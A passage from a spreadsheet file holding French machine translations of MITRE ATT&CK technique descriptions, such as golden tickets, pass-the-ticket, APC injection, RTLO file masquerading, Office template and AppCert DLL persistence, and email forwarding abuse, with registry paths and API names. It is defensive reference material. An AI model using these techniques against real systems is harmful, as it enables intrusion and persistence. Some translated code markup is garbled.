Les adversaires peuvent facilement recueillir les noms des employés, car ils peuvent être facilement accessibles et exposés par le biais d’articles en ligne ou d’autres ensembles de données accessibles (p. ex., [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite OPM) La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598)), l’établissement de ressources opérationnelles (ex : [Comptes compromis](https://attack.mitre.org/techniques/T1586)), et/ou l’accès initial (ex : [Phishing](https://attack.mitre.org/techniques/T1566) ou [Comptes valides]( https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1589/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de recueillir des informations sur les relations d’approbation de domaine qui peuvent être utilisées pour identifier les opportunités de mouvement latéral dans les environnements multidomaines/forestiers Windows. Les approbations de domaine fournissent un mécanisme permettant à un domaine d’autoriser l’accès aux ressources en fonction des procédures d’authentification d’un autre domaine. (Citation : Microsoft Trusts) Les approbations de domaine permettent aux utilisateurs du domaine approuvé d’accéder aux ressources du domaine d’approbation. Les informations découvertes peuvent aider l’adversaire à effectuer [Injection d’historique SID](https://attack.mitre.org/techniques/T1134/005), [Passer le billet](https://attack.mitre.org/techniques/T1550/003) et [Kerberoasting](https://attack.mitre.org/techniques/T1558/003). (Citation : AdSecurity Forging Trust Tickets)(Citation : Harmj0y Domain Trusts) Les approbations de domaine peuvent être énumérées à l’aide de l’appel d’API Win32 « DSEnumerateDomainTrusts() », des méthodes .NET et LDAP. (Citation : Harmj0y Domain Trusts) L’utilitaire Windows [Nltest](https://attack.mitre.org/software/S0359) est connu pour être utilisé par des adversaires pour énumérer les approbations de domaine. (Citation : Opération Microsoft Wilysupply)
https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>Les adversaires qui disposent du hachage de mot de passe du compte KRBTGT peuvent falsifier des tickets d’octroi de tickets Kerberos (TGT), également appelés tickets d’or. (Citation : AdSecurity Kerberos GT août 2015) Les tickets d’or permettent aux adversaires de générer du matériel d’authentification pour n’importe quel compte dans Active Directory. (Citation : CERT-EU Golden Ticket Protection) 
À l’aide d’un ticket d’or, les adversaires peuvent ensuite demander des tickets TGS (Ticket granting Service), qui permettent d’accéder à des ressources spécifiques. Les tickets d’or nécessitent que les adversaires interagissent avec le Key Distribution Center (KDC) afin d’obtenir le TGS. (Citation : ADSecurity détecte les tickets falsifiés)
Le service KDC s’exécute entièrement sur des contrôleurs de domaine qui font partie d’un domaine Active Directory. KRBTGT est le compte de service du centre de distribution de clés Kerberos (KDC) et est responsable du chiffrement et de la signature de tous les tickets Kerberos. (Référence : ADSecurity Kerberos et KRBTGT) Le hachage du mot de passe KRBTGT peut être obtenu à l’aide de [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) et d’un accès privilégié à un contrôleur de domaine.
https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exfiltrer des données, telles que des documents sensibles, par le biais d’un traitement automatisé après avoir été collectées lors de la collecte. (Citation : ESET Gamaredon juin 2020) 
Lorsque l’exfiltration automatisée est utilisée, d’autres techniques d’exfiltration s’appliquent probablement également pour transférer les informations hors du réseau, telles que [Exfiltration sur le canal C2](https://attack.mitre.org/techniques/T1041) et [Exfiltration sur un protocole alternatif](https://attack.mitre.org/techniques/T1048).
https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les configurations du client de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les configurations du client peuvent inclure une variété de détails et de paramètres, notamment le système d’exploitation/la version, la virtualisation, l’architecture (par exemple : 32 ou 64 bits), la langue et/ou le fuseau horaire.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’actions de collecte directes via [Analyse active](https://attack.mitre.org/techniques/T1595) (par exemple, ports d’écoute, bannières de serveur, chaînes d’agent utilisateur) ou [Hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les adversaires peuvent également compromettre les sites et inclure du contenu malveillant conçu pour collecter des informations sur l’hôte auprès des visiteurs. (Citation : ATT ScanBox) Les informations sur les configurations du client peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (par exemple, des offres d’emploi, des cartes de réseau, des rapports d’évaluation, des CV ou des factures d’achat). La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Recherche de bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou d’accès initial (ex : [Chaîne d’approvisionnement compromis](https://attack.mitre.org/techniques/T1195) ou [services à distance externes](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1592/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver ou modifier un pare-feu dans un environnement cloud pour contourner les contrôles qui limitent l’accès aux ressources cloud. Les pare-feu cloud sont distincts des pare-feu système décrits dans [Désactiver ou modifier le pare-feu système](https://attack.mitre.org/techniques/T1562/004). 
Les environnements cloud utilisent généralement des groupes de sécurité restrictifs et des règles de pare-feu qui n’autorisent l’activité réseau qu’à partir d’adresses IP de confiance via les ports et protocoles attendus. Un adversaire disposant des autorisations appropriées peut introduire de nouvelles règles ou politiques de pare-feu pour autoriser l’accès à un environnement cloud victime et/ou se déplacer latéralement du plan de contrôle du cloud au plan de données. Par exemple, un adversaire peut utiliser un script ou un utilitaire qui crée de nouvelles règles d’entrée dans des groupes de sécurité existants (ou crée entièrement de nouveaux groupes de sécurité) pour autoriser toute connectivité TCP/IP à une instance hébergée dans le cloud. (Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) Ils peuvent également supprimer les limitations de réseau pour prendre en charge le trafic associé à des activités malveillantes (telles que le minage de cryptomonnaie). (Citation : Expulser IO Evil dans AWS)(Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
La modification ou la désactivation d’un pare-feu cloud peut permettre des communications C2 adverses, des mouvements latéraux et/ou l’exfiltration de données qui ne seraient pas autorisés autrement. Il peut également être utilisé pour ouvrir des ressources pour la [Force brute](https://attack.mitre.org/techniques/T1110) ou le [Déni de service du point de terminaison](https://attack.mitre.org/techniques/T1499).
https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du caractère de remplacement de droite à gauche (RTLO ou RLO) (U+202E) pour dissimuler une chaîne et/ou un nom de fichier afin de le faire paraître inoffensif. RTLO est un caractère Unicode non imprimable qui provoque l’affichage du texte qui le suit à l’envers. Par exemple, un exécutable de l’économiseur d’écran Windows nommé &lt;code&gt;25 mars \u202Excod.scr s’affichera&lt;/code&gt; comme &lt;code&gt;25 mars rcs.docx&lt;/code&gt;. Un fichier JavaScript nommé &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; s’affichera sous &lt;code&gt;la forme photo_high_resj.png&lt;/code&gt;. (Citation : Infosecinstitute RTLO Technique)
Les adversaires peuvent abuser du caractère RTLO pour inciter un utilisateur à exécuter ce qu’il pense être un type de fichier inoffensif. Cette technique est couramment utilisée avec [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002), car elle peut tromper à la fois les utilisateurs finaux et les défenseurs s’ils ne sont pas conscients de la façon dont leurs outils affichent et affichent le caractère RTLO. L’utilisation du caractère RTLO a été observée dans de nombreuses tentatives d’intrusion ciblées et activités criminelles. (Citation : Trend Micro PPLAIDE RTLO)(Référence : Kaspersky RTLO Cyber Crime) RTLO peut également être utilisé dans le registre Windows, où regedit.exe affiche les caractères inversés, mais pas l’outil de ligne de commande reg.exe par défaut.
https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, voler ou télécharger des logiciels malveillants qui peuvent être utilisés lors du ciblage. Les logiciels malveillants peuvent inclure des charges utiles, des droppers, des outils de post-compromission, des portes dérobées, des packers et des protocoles C2. Les adversaires peuvent acquérir des logiciels malveillants pour soutenir leurs opérations, obtenir un moyen de garder le contrôle des machines distantes, d’échapper aux défenses et d’exécuter des comportements post-compromission.
En plus de télécharger des logiciels malveillants gratuits sur Internet, les adversaires peuvent acheter ces fonctionnalités auprès d’entités tierces. Il peut s’agir d’entreprises technologiques spécialisées dans le développement de logiciels malveillants, de places de marché criminelles (y compris Malware-as-a-Service ou MaaS) ou de particuliers. En plus d’acheter des logiciels malveillants, les adversaires peuvent voler et réutiliser des logiciels malveillants auprès d’entités tierces (y compris d’autres adversaires).
https://attack.mitre.org/techniques/T1588/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le micrologiciel des composants pour qu’il persiste sur les systèmes. Certains adversaires peuvent utiliser des moyens sophistiqués pour compromettre les composants de l’ordinateur et installer un micrologiciel malveillant qui exécutera du code adverseur en dehors du système d’exploitation et du microprogramme ou du BIOS du système principal. Cette technique peut être similaire à celle du [Microprogramme système](https://attack.mitre.org/techniques/T1542/001), mais appliquée à d’autres composants/périphériques du système qui peuvent ne pas avoir la même capacité ou le même niveau de vérification de l’intégrité.
Les microprogrammes de composants malveillants peuvent fournir à la fois un niveau d’accès persistant aux systèmes malgré les défaillances potentielles typiques de maintien de l’accès et de réimages du disque dur, ainsi qu’un moyen d’échapper aux défenses logicielles de l’hôte et aux contrôles d’intégrité.
https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent supprimer ou modifier les artefacts générés dans les systèmes pour supprimer les preuves de leur présence ou entraver les défenses. Divers artefacts peuvent être créés par un adversaire ou quelque chose qui peut être attribué aux actions d’un adversaire. En règle générale, ces artefacts sont utilisés comme indicateurs défensifs liés aux événements surveillés, tels que les chaînes de caractères des fichiers téléchargés, les journaux générés à partir des actions de l’utilisateur et d’autres données analysées par les défenseurs. L’emplacement, le format et le type d’artefact (par exemple, la commande ou l’historique de connexion) sont souvent spécifiques à chaque plate-forme.
La suppression de ces indicateurs peut interférer avec la collecte d’événements, la création de rapports ou d’autres processus utilisés pour détecter les activités d’intrusion. Cela peut compromettre l’intégrité des solutions de sécurité en faisant en sorte que des événements notables ne soient pas signalés. Cette activité peut également entraver l’analyse judiciaire et l’intervention en cas d’incident, en raison du manque de données suffisantes pour déterminer ce qui s’est passé.
https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des données en les exfiltrant via un protocole réseau chiffré symétriquement autre que celui du canal de commande et de contrôle existant. Les données peuvent également être envoyées à un autre emplacement réseau à partir du serveur de commande et de contrôle principal. 
Les algorithmes de chiffrement symétrique sont ceux qui utilisent des clés/secrets partagés ou identiques à chaque extrémité du canal. Cela nécessite un échange ou un accord préétabli/la possession de la valeur utilisée pour crypter et décrypter les données. 
Les protocoles réseau qui utilisent le chiffrement asymétrique utilisent souvent le chiffrement symétrique une fois les clés échangées, mais les adversaires peuvent choisir de partager manuellement les clés et d’implémenter des algorithmes de chiffrement symétrique (ex : RC4, AES) plutôt que d’utiliser des mécanismes intégrés dans un protocole. Cela peut entraîner plusieurs couches de chiffrement (dans les protocoles chiffrés nativement, tels que HTTPS) ou le chiffrement dans des protocoles qui ne sont généralement pas chiffrés (tels que HTTP ou FTP).
https://attack.mitre.org/techniques/T1048/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des modèles Microsoft Office pour obtenir la persistance sur un système compromis. Microsoft Office contient des modèles qui font partie des applications Office courantes et qui sont utilisés pour personnaliser les styles. Les modèles de base de l’application sont utilisés chaque fois qu’une application démarre. (Citation : Microsoft Change Normal Template)
Les macros Office Visual Basic pour Applications (VBA) (Référence : MSDN VBA dans Office) peuvent être insérées dans le modèle de base et utilisées pour exécuter du code au démarrage de l’application Office respective afin d’obtenir la persistance. Des exemples pour Word et Excel ont été découverts et publiés. Par défaut, Word dispose d’un modèle Normal.dotm créé qui peut être modifié pour inclure une macro malveillante. Excel n’a pas de fichier modèle créé par défaut, mais il est possible d’en ajouter un qui sera automatiquement chargé. (Citation : enigma0x3 normal.dotm)(Citation : Macros de modèle de bureau hexacorn) Les modèles partagés peuvent également être stockés et extraits à partir d’emplacements distants. (Citation : GlobalDotName juin 2019) 
Emplacement de Word Normal.dotm :&lt;br&gt;
&lt;code&gt;C :\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Emplacement du fichier Excel Personal.xlsb :&lt;br&gt;
&lt;code&gt;C :\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL. XLSB&lt;/code&gt;
Les adversaires peuvent également modifier l’emplacement du modèle de base pour qu’il pointe vers le leur en détournant l’ordre de recherche de l’application, par exemple Word 2016 recherchera d’abord Normal.dotm sous &lt;code&gt;C :\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, ou en modifiant la clé de registre GlobalDotName. En modifiant la clé de registre GlobalDotName, un adversaire peut spécifier un emplacement, un nom de fichier et une extension de fichier arbitraires à utiliser pour le modèle qui sera chargé au démarrage de l’application. Pour abuser de GlobalDotName, les adversaires peuvent d’abord avoir besoin d’enregistrer le modèle en tant que document de confiance ou de le placer dans un emplacement de confiance. (Citation : GlobalDotName juin 2019) 
Un adversaire peut avoir besoin d’activer l’exécution illimitée des macros en fonction de la politique de sécurité du système ou de l’entreprise sur l’utilisation des macros.
https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent louer des serveurs privés virtuels (VPS) qui peuvent être utilisés pendant le ciblage. Il existe une variété de fournisseurs de services cloud qui vendent des machines virtuelles/conteneurs en tant que service. En utilisant un VPS, les adversaires peuvent rendre difficile le lien physique entre eux et les opérations. L’utilisation d’une infrastructure cloud peut également permettre aux adversaires de provisionner, de modifier et d’arrêter rapidement leur infrastructure.
L’acquisition d’un VPS à utiliser dans les étapes ultérieures du cycle de vie de l’adversaire, telles que la commande et le contrôle, peut permettre aux adversaires de bénéficier de l’omniprésence et de la confiance associées aux fournisseurs de services cloud de meilleure réputation. Les adversaires peuvent également acquérir de l’infrastructure auprès de fournisseurs de services VPS connus pour louer des VPS avec un minimum d’informations d’enregistrement, ce qui permet des acquisitions d’infrastructure plus anonymes. (Citation : TrendmicroHideoutsLease)
https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les référentiels Confluence pour extraire des informations précieuses. Souvent présent dans les environnements de développement aux côtés d’Atlassian JIRA, Confluence est généralement utilisé pour stocker la documentation liée au développement, mais peut en général contenir des catégories plus diverses d’informations utiles, telles que :
* Politiques, procédures et normes
* Diagrammes de réseau physiques / logiques
* Diagrammes d’architecture système
* Documentation technique du système
* Références de test/développement (c’est-à-dire, [Informations d’identification non sécurisées](https://attack.mitre.org/techniques/T1552))
* Calendriers de travaux / projets
* Extraits de code source
* Liens vers des partages de réseau et d’autres ressources internes
https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent « passer le ticket » à l’aide de tickets Kerberos volés pour se déplacer latéralement dans un environnement, en contournant les contrôles d’accès normaux au système. Pass the ticket (PtT) est une méthode d’authentification auprès d’un système à l’aide de tickets Kerberos sans avoir accès au mot de passe d’un compte. L’authentification Kerberos peut être utilisée comme première étape du mouvement latéral vers un système distant.
Lors de l’exécution de PtT, les tickets Kerberos valides pour les [Comptes valides](https://attack.mitre.org/techniques/T1078) sont capturés par [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003). Un ticket de service de l’utilisateur ou un ticket d’octroi de ticket (TGT) peut être obtenu, en fonction du niveau d’accès. Un ticket de service permet d’accéder à une ressource particulière, tandis qu’un TGT peut être utilisé pour demander des tickets de service au service d’octroi de tickets (TGS) afin d’accéder à toute ressource à laquelle l’utilisateur dispose de privilèges d’accès. (Citation : Attaques ADSecurity AD Kerberos)(Citation : GentilKiwi Pass the Ticket)
Un [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) peut être obtenu pour les services qui utilisent Kerberos comme mécanisme d’authentification et qui sont utilisés pour générer des tickets permettant d’accéder à cette ressource particulière et au système qui héberge la ressource (par exemple, SharePoint). (Citation : Attaques ADSecurity AD Kerberos)
Un [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) peut être obtenu pour le domaine à l’aide du hachage NTLM du compte du service de distribution de clés KRBTGT, qui permet de générer des TGT pour n’importe quel compte dans Active Directory. (Référence : Campbell 2014)
Les adversaires peuvent également créer un ticket Kerberos valide à l’aide d’autres informations utilisateur, telles que des hachages de mot de passe volés ou des clés AES. Par exemple, le « dépassement du hachage » implique l’utilisation d’un hachage de mot de passe NTLM pour s’authentifier en tant qu’utilisateur (c’est-à-dire [Passer le hachage](https://attack.mitre.org/techniques/T1550/002)) tout en utilisant le hachage de mot de passe pour créer un ticket Kerberos valide. (Citation : Stealthbits Overpass-the-Hash)
https://attack.mitre.org/techniques/T1550/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser d’un service d’administration de conteneur pour exécuter des commandes au sein d’un conteneur. Un service d’administration de conteneurs tel que le démon Docker, le serveur d’API Kubernetes ou le kubelet peut permettre la gestion à distance de conteneurs au sein d’un environnement. (Citation : Docker Daemon CLI)(Citation : API Kubernetes)(Citation : Kubernetes Kubelet)
Dans Docker, les adversaires peuvent spécifier un point d’entrée lors du déploiement du conteneur qui exécute un script ou une commande, ou ils peuvent utiliser une commande telle que &lt;code&gt;docker exec&lt;/code&gt; pour exécuter une commande dans un conteneur en cours d’exécution. (Citation : Docker Entrypoint)(Citation : Docker Exec) Dans Kubernetes, si un adversaire dispose d’autorisations suffisantes, il peut obtenir une exécution à distance dans un conteneur du cluster via une interaction avec le serveur d’API Kubernetes, le kubelet ou en exécutant une commande telle que &lt;code&gt;kubectl exec&lt;/code&gt;. (Citation : Kubectl Exec Get Shell)
https://attack.mitre.org/techniques/T1609</t>
  </si>
  <si>
    <t>Les adversaires peuvent énumérer des fichiers et des répertoires ou rechercher certaines informations au sein d’un système de fichiers dans des emplacements spécifiques d’un hôte ou d’un partage réseau. Les adversaires peuvent utiliser les informations de la [Découverte de fichiers et de répertoires](https://attack.mitre.org/techniques/T1083) lors de la découverte automatique pour façonner les comportements de suivi, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
De nombreux utilitaires d’interpréteur de commandes peuvent être utilisés pour obtenir ces informations. Il &lt;code&gt;s’agit&lt;/code&gt; par exemple &lt;code&gt;de dir&lt;/code&gt;, tree, &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt; et &lt;code&gt;locate&lt;/code&gt;. (Citation : Commandes Windows JPCERT) Des outils personnalisés peuvent également être utilisés pour collecter des informations sur les fichiers et les répertoires et interagir avec l'[API native](https://attack.mitre.org/techniques/T1106). Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour collecter des informations de fichiers et de répertoires (par exemple, &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;show flash&lt;/code&gt; et/ou &lt;code&gt;nvram&lt;/code&gt;). (Référence : US-CERT-TA18-106A)
L’accès à certains fichiers et répertoires peut nécessiter des autorisations d’utilisateur élevées ou spécifiques.
https://attack.mitre.org/techniques/T1083</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir dynamiquement des connexions à l’infrastructure de commande et de contrôle pour échapper aux détections et aux remédiations courantes. Cela peut être réalisé en utilisant des logiciels malveillants qui partagent un algorithme commun avec l’infrastructure que l’adversaire utilise pour recevoir les communications du logiciel malveillant. Ces calculs peuvent être utilisés pour ajuster dynamiquement des paramètres tels que le nom de domaine, l’adresse IP ou le numéro de port que le logiciel malveillant utilise pour la commande et le contrôle.
Les adversaires peuvent utiliser la résolution dynamique dans le but de créer des [Canaux de secours](https://attack.mitre.org/techniques/T1008). Lorsque le contact est perdu avec le serveur de commande et de contrôle principal, les logiciels malveillants peuvent utiliser la résolution dynamique comme moyen de rétablir la commande et le contrôle. (Citation : Talos CCleanup 2017)(Citation : FireEye POSHSPY avril 2017)(Citation : Activité ESET Sednit 2017)
https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de manipuler le nom d’une tâche ou d’un service pour le faire paraître légitime ou inoffensif. Les tâches/services exécutés par le planificateur de tâches ou systemd reçoivent généralement un nom et/ou une description. (Citation : TechNet Schtasks)(Citation : Unités de service Systemd) Les services Windows auront un nom de service ainsi qu’un nom d’affichage. Il existe de nombreuses tâches et services bénins qui ont des noms communément associés. Les adversaires peuvent donner à des tâches ou à des services des noms similaires ou identiques à ceux de sites légitimes.
Les tâches ou les services contiennent d’autres champs, tels qu’une description, que les adversaires peuvent tenter de faire paraître légitimes. (Citation : Palo Alto Shamoon, novembre 2016)(Citation : Fysbis Dr Web Analysis)
https://attack.mitre.org/techniques/T1036/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans les processus via la file d’attente d’appels de procédure asynchrone (APC) afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection APC est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
L’injection APC est généralement effectuée en attachant un code malveillant à la file d’attente APC (Citation : Microsoft APC) du thread d’un processus. Les fonctions APC en file d’attente sont exécutées lorsque le thread entre dans un état modifiable. (Citation : Microsoft APC) Un handle vers un processus victime existant est d’abord créé à l’aide d’appels d’API Windows natifs tels &lt;code&gt;qu’OpenThread&lt;/code&gt;. À ce stade&lt;code&gt;, QueueUserAPC&lt;/code&gt; peut être utilisé pour appeler une fonction (telle que &lt;code&gt;LoadLibrayA&lt;/code&gt; pointant vers une DLL malveillante). 
Une variante de l’injection APC, surnommée « injection Early Bird », consiste à créer un processus suspendu dans lequel du code malveillant peut être écrit et exécuté avant le point d’entrée du processus (et potentiellement les crochets anti-malware ultérieurs) via un APC. (Citation : CyberBit Early Bird avril 2018) AtomBombing (Citation : ENSIL AtomBombing Oct 2016) est une autre variante qui utilise des APC pour invoquer du code malveillant précédemment écrit dans la table globale atom. (Citation : Microsoft Atom Table)
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution via l’injection APC peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter la mise en miroir du trafic afin d’automatiser l’exfiltration de données sur une infrastructure compromise. La mise en miroir du trafic est une fonctionnalité native pour certains appareils, souvent utilisée pour l’analyse du réseau. Par exemple, les périphériques peuvent être configurés pour transférer le trafic réseau vers une ou plusieurs destinations à des fins d’analyse par un analyseur de réseau ou un autre dispositif de surveillance. (Citation : Cisco Traffic Mirroring)(Citation : Mise en miroir du trafic Juniper)
Les adversaires peuvent abuser de la mise en miroir du trafic pour refléter ou rediriger le trafic réseau via d’autres infrastructures qu’ils contrôlent. Des modifications malveillantes des périphériques réseau pour permettre la redirection du trafic peuvent être possibles via [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) ou [Patch System Image](https://attack.mitre.org/techniques/T1601/001). (Référence : US-CERT-TA18-106A)(Citation : Blog Cisco Legacy Device Attacks)
De nombreux environnements basés sur le cloud prennent également en charge la mise en miroir du trafic. Par exemple, AWS Traffic Mirroring, GCP Packet Mirroring et Azure vTap permettent aux utilisateurs de définir des instances spécifiées à partir desquelles collecter le trafic et des cibles spécifiées auxquelles envoyer le trafic collecté. (Citation : Mise en miroir du trafic AWS)(Citation : Mise en miroir des paquets GCP)(Référence : Azure Virtual Network TAP)
Les adversaires peuvent utiliser la duplication du trafic conjointement avec [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056) ou [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) en fonction des buts et objectifs de l’adversaire.
https://attack.mitre.org/techniques/T1020/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les fichiers de liste de propriétés (fichiers plist) pour permettre d’autres activités malveillantes, tout en évitant et en contournant les défenses du système. Les applications macOS utilisent des fichiers plist, tels que le fichier &lt;code&gt;info.plist&lt;/code&gt;, pour stocker les propriétés et les paramètres de configuration qui informent le système d’exploitation sur la façon de gérer l’application au moment de l’exécution. Les fichiers Plist sont des métadonnées structurées en paires clé-valeur formatées en XML basées sur la DTD Core Foundation d’Apple. Les fichiers Plist peuvent être enregistrés au format texte ou binaire. (Citation : fileinfo plist file description) 
Les adversaires peuvent modifier les paires clé-valeur dans les fichiers plist pour influencer les comportements du système, par exemple en masquant l’exécution d’une application (par exemple, [Fenêtre cachée](https://attack.mitre.org/techniques/T1564/003)) ou en exécutant des commandes supplémentaires pour la persistance (ex : [Agent de lancement](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) ou [Applications rouvertes](https://attack.mitre.org/techniques/T1547/007)).
Par exemple, les adversaires peuvent ajouter un chemin d’accès d’application malveillant au fichier « ~/Library/Preferences/com.apple.dock.plist », qui contrôle les applications qui apparaissent dans le Dock. Les adversaires peuvent également modifier la clé &lt;code&gt;LSUIElement&lt;/code&gt; dans le fichier &lt;code&gt;info.plist&lt;/code&gt; d’une application pour exécuter l’application en arrière-plan. Les adversaires peuvent également insérer des paires clé-valeur pour insérer des variables d’environnement, telles que &lt;code&gt;LSEnvironment&lt;/code&gt;, afin d’activer la persistance via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006). (Citation : persistance de wardle chp2)(Référence : eset_osx_flashback)
https://attack.mitre.org/techniques/T1647</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges en exécutant du contenu malveillant déclenché par des DLL AppCert chargées dans des processus. Les bibliothèques de liens dynamiques (DLL) spécifiées dans la clé de registre &lt;code&gt;AppCertDLLs&lt;/code&gt; sous &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; sont chargées dans chaque processus qui appelle les fonctions d’interface de programmation d’application (API) utilisées de manière omniprésente &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; ou &lt;code&gt;WinExec&lt;/code&gt;. (Citation : Injection de processus élastique juillet 2017)
À l’instar de [Process Injection](https://attack.mitre.org/techniques/T1055), cette valeur peut être utilisée de manière abusive pour obtenir des privilèges élevés en provoquant le chargement et l’exécution d’une DLL malveillante dans le contexte de processus distincts sur l’ordinateur. Les DLL AppCert malveillantes peuvent également fournir une persistance en étant continuellement déclenchées par l’activité de l’API.
https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent configurer des règles de transfert d’e-mails pour collecter des informations sensibles. Les adversaires peuvent abuser des règles de transfert d’e-mails pour surveiller les activités d’une victime, voler des informations et obtenir des informations sur la victime ou sur l’organisation de la victime afin de les utiliser dans le cadre d’autres exploits ou opérations. (Référence : US-CERT TA18-068A 2018) De plus, les règles de transfert d’e-mails peuvent permettre aux adversaires de conserver un accès persistant aux e-mails de la victime, même après la réinitialisation des informations d’identification compromises par les administrateurs. (citation : pfammatter - règles de boîte de réception cachées) La plupart des clients de messagerie permettent aux utilisateurs de créer des règles de boîte de réception pour diverses fonctions de messagerie, y compris le transfert vers un autre destinataire. Ces règles peuvent être créées par le biais d’une application de messagerie locale, d’une interface Web ou d’une interface de ligne de commande. Les messages peuvent être transférés à des destinataires internes ou externes, et il n’existe aucune restriction limitant l’étendue de cette règle. Les administrateurs peuvent également créer des règles de transfert pour les comptes d’utilisateur avec les mêmes considérations et résultats. (Citation : Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation : Règles de transfert Mac)
Tout utilisateur ou administrateur de l’organisation (ou tout adversaire disposant d’informations d’identification valides) peut créer des règles pour transférer automatiquement tous les messages reçus à un autre destinataire, transférer les e-mails vers différents emplacements en fonction de l’expéditeur, etc. Les adversaires peuvent également masquer la règle en utilisant l’API de messagerie Microsoft (MAPI) pour modifier les propriétés de la règle, ce qui la rend masquée et non visible à partir d’Outlook, d’OWA ou de la plupart des outils d’administration Exchange. (citation : pfammatter - règles de boîte de réception cachées)
Dans certains environnements, les administrateurs peuvent être en mesure d’activer des règles de transfert d’e-mails qui s’appliquent à l’ensemble de l’organisation plutôt qu’aux boîtes de réception individuelles. Par exemple, Microsoft Exchange prend en charge les règles de transport qui évaluent tous les messages qu’une organisation reçoit par rapport aux conditions spécifiées par l’utilisateur, puis effectuent une action spécifiée par l’utilisateur sur les messages qui respectent ces conditions. (Citation : Règles de flux de messagerie Microsoft 2023) Les adversaires qui abusent de ces fonctionnalités peuvent être en mesure d’activer le transfert de tout le courrier reçu par une organisation ou d’un courrier spécifique.
https://attack.mitre.org/techniques/T1114/003</t>
  </si>
  <si>
